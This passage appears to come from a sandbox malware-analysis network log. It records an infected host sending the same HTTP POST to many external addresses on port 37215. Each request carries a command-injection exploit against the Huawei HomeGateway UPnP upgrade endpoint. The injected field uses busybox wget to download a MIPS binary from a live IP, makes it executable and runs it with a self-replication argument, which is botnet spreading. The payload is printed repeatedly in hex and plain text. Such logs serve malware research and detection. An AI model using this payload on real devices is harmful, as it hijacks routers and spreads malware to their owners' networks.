                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1179192.168.2.134274498.159.152.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520730019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1180192.168.2.133446641.131.234.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520764112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1181192.168.2.1354334197.114.48.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520905972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1182192.168.2.1356742197.44.111.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520927906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1183192.168.2.135248641.110.217.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.520994902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1184192.168.2.1350644163.68.176.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521280050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1185192.168.2.1335910157.63.157.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521307945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1186192.168.2.135839241.30.152.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521631002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1187192.168.2.1358114157.227.196.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521658897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1188192.168.2.1356522116.94.211.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521662951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
